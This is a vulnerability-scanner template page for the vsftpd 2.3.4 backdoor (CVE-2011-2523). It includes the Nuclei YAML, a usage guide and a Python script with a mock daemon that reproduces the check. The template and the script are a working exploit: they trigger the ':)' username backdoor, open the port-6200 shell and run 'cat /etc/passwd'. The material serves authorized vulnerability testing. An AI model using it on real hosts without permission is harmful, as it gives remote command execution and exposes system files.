VSFTPD 2.3.4 - Backdoor Command Execution
ID: CVE-2011-2523
Severity: critical
Author: pussycat0x
Tags: packetstorm,cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project,tcp
Description
The vsftpd 2.3.4 release archive was trojaned: the modified daemon contains a backdoor that is armed when the username sent in the FTP USER command contains the character sequence ":)". No valid credentials are needed. The trigger makes the daemon open a listening shell on TCP port 6200, and anyone who then connects to that port gets a command shell with the daemon's root-level privileges and can execute arbitrary commands on the server.
YAML Source
id: CVE-2011-2523

info:
  name: VSFTPD 2.3.4 - Backdoor Command Execution
  author: pussycat0x
  severity: critical
  description: |
    VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the FTP server.
  remediation: |
    Update to the latest version of VSFTPD, which does not contain the backdoor.
  reference:
    - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
    - https://www.exploit-db.com/exploits/49757
    - http://packetstormsecurity.com/files/162145/vsftpd-2.3.4-Backdoor-Command-Execution.html
    - https://access.redhat.com/security/cve/cve-2011-2523
    - https://security-tracker.debian.org/tracker/CVE-2011-2523
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2011-2523
    cwe-id: CWE-78
    epss-score: 0.85861
    epss-percentile: 0.98557
    cpe: cpe:2.3:a:vsftpd_project:vsftpd:2.3.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: vsftpd_project
    product: vsftpd
    shodan-query: product:"vsftpd"
  tags: packetstorm,cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project,tcp

variables:
  cmd: "cat /etc/passwd" # shows the user and group names and numeric IDs

tcp:
  - host:
      - "{{Hostname}}"
    port: 21
    inputs:
      - data: "USER letmein:)\r\nPASS please\r\n"
        read: 100

  - host:
      - "{{Host}}:6200"
    inputs:
      - data: "{{cmd}}\n"
        read: 100
    matchers:
      - type: regex
        part: raw
        regex:
          - "root:.*:0:0:"
# digest: 4b0a00483046022100b504bd4b64591542e30a46de3001848e9fe050fe03bff61bdf2b3620560bf486022100cc5bd4876cf0840f4db069fb6f80a5c05d6bbb42b06cd42e085c1af70a870768:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This is a network (tcp) template, not an HTTP one. Nuclei connects to the FTP service on the target (port 21 by default), sends the USER/PASS lines from the first tcp block so that the ":)" in the username arms the backdoor, then opens a second connection to port 6200 on the same host, sends the value of the cmd variable and applies the regex matcher to the raw reply. Pass the FTP host as the target:
$ nuclei -u "HOST" -t "network/cves/2011/CVE-2011-2523.yaml"
Two points to keep in mind when reading a result. First, the check is active exploitation, not a banner or version comparison: a positive result means the scanner triggered the backdoor and executed a command on the host, and the shell listener it opens on port 6200 is reachable by anyone, so run the template only against systems you are authorized to test. Second, the matcher looks for the root entry in /etc/passwd, which is world-readable; a match proves that the command ran, not that it ran as root. Replace cmd with id (and the regex with uid=0) if you need to confirm the privilege level.
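The following Python script is an added example, not code from the template, from Nuclei or from vsftpd. It reproduces the template's two tcp steps with raw sockets (trigger on the FTP port, then command on the shell port, then the same regex over the raw reply) and, so that it runs offline, pairs them with a constructed in-process mock of the daemon. The mock listens on ephemeral loopback ports instead of 21 and 6200, its behaviour is modelled on the backdoor description above (a USER line containing ":)" arms the shell port; a clean build never answers there), and the /etc/passwd content it returns is made up for the example.

```python
"""Socket-level reproduction of the two tcp steps in the CVE-2011-2523 Nuclei
template, run offline against a constructed mock of the trojaned vsftpd.
Added example; not code from the template, from Nuclei, or from vsftpd."""
import re
import socket
import threading

TRIGGER = b"USER letmein:)\r\nPASS please\r\n"   # username carries the ":)" trigger
PASSWD_RE = re.compile(r"root:.*:0:0:")           # the template's regex matcher


def recv_some(sock, n=100, timeout=2.0):
    """Read up to n bytes, mirroring `read: 100`; b'' on timeout or reset."""
    sock.settimeout(timeout)
    try:
        return sock.recv(n)
    except OSError:
        return b""


def check_backdoor(host, ftp_port=21, shell_port=6200,
                   cmd="cat /etc/passwd", timeout=2.0):
    """Step 1: send the trigger to the FTP port.  Step 2: connect to the
    shell port, send cmd, apply PASSWD_RE to the raw reply.
    Returns (matched, raw_reply).  A match proves the command ran, not
    that it ran as root: /etc/passwd is world-readable."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as ftp:
        recv_some(ftp, timeout=timeout)           # 220 banner
        ftp.sendall(TRIGGER)
        recv_some(ftp, timeout=timeout)           # 331 / 530, irrelevant here
    try:
        with socket.create_connection((host, shell_port), timeout=timeout) as sh:
            sh.sendall(cmd.encode() + b"\n")
            reply = recv_some(sh, timeout=timeout)
    except OSError:                               # nothing listening: clean build
        return False, b""
    return bool(PASSWD_RE.search(reply.decode(errors="replace"))), reply


# --- constructed mock of the FTP daemon (not vsftpd code) -------------------
FAKE_PASSWD = (b"root:x:0:0:root:/root:/bin/bash\n"
               b"ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\n")  # constructed


class MockVsftpd:
    """Listens on two ephemeral loopback ports.  With backdoored=True a USER
    line containing ':)' arms the shell port, which then answers one command;
    with backdoored=False the shell port never answers, like a clean build."""

    def __init__(self, backdoored=True):
        self.backdoored = backdoored
        self._armed = threading.Event()
        self._ftp = self._listen()
        self._shell = self._listen()
        self.ftp_port = self._ftp.getsockname()[1]
        self.shell_port = self._shell.getsockname()[1]
        threading.Thread(target=self._serve_ftp, daemon=True).start()
        threading.Thread(target=self._serve_shell, daemon=True).start()

    @staticmethod
    def _listen():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("127.0.0.1", 0))                  # ephemeral port, not 21/6200
        s.listen(5)
        return s

    def _serve_ftp(self):
        while True:
            conn, _ = self._ftp.accept()
            with conn:
                conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
                buf = b""
                while b"\r\n" not in buf:         # read at least the USER line
                    chunk = conn.recv(1024)
                    if not chunk:
                        break
                    buf += chunk
                user_line = buf.split(b"\r\n", 1)[0]
                if self.backdoored and user_line.startswith(b"USER") and b":)" in user_line:
                    self._armed.set()             # stands in for the backdoor being triggered
                conn.sendall(b"331 Please specify the password.\r\n")

    def _serve_shell(self):
        self._armed.wait()                        # never fires on a clean build
        conn, _ = self._shell.accept()            # one connection, like the real listener
        with conn:
            cmd = conn.recv(1024).strip()
            conn.sendall(FAKE_PASSWD if cmd == b"cat /etc/passwd"
                         else b"sh: 1: " + cmd + b": not found\n")


if __name__ == "__main__":
    for flag in (True, False):
        srv = MockVsftpd(backdoored=flag)
        matched, raw = check_backdoor("127.0.0.1", srv.ftp_port, srv.shell_port, timeout=1.0)
        print(f"backdoored={flag}: matched={matched} reply={raw[:40]!r}")
```

Against a real host the call is simply check_backdoor(host) with the default ports, and it carries the same caveat as the template: a True result means a command was executed on the target through the backdoor, so use it only with authorization. The clean-build branch returns (False, b"") whether the shell port refuses the connection or accepts it and stays silent, which is why the timeout is a parameter rather than a constant.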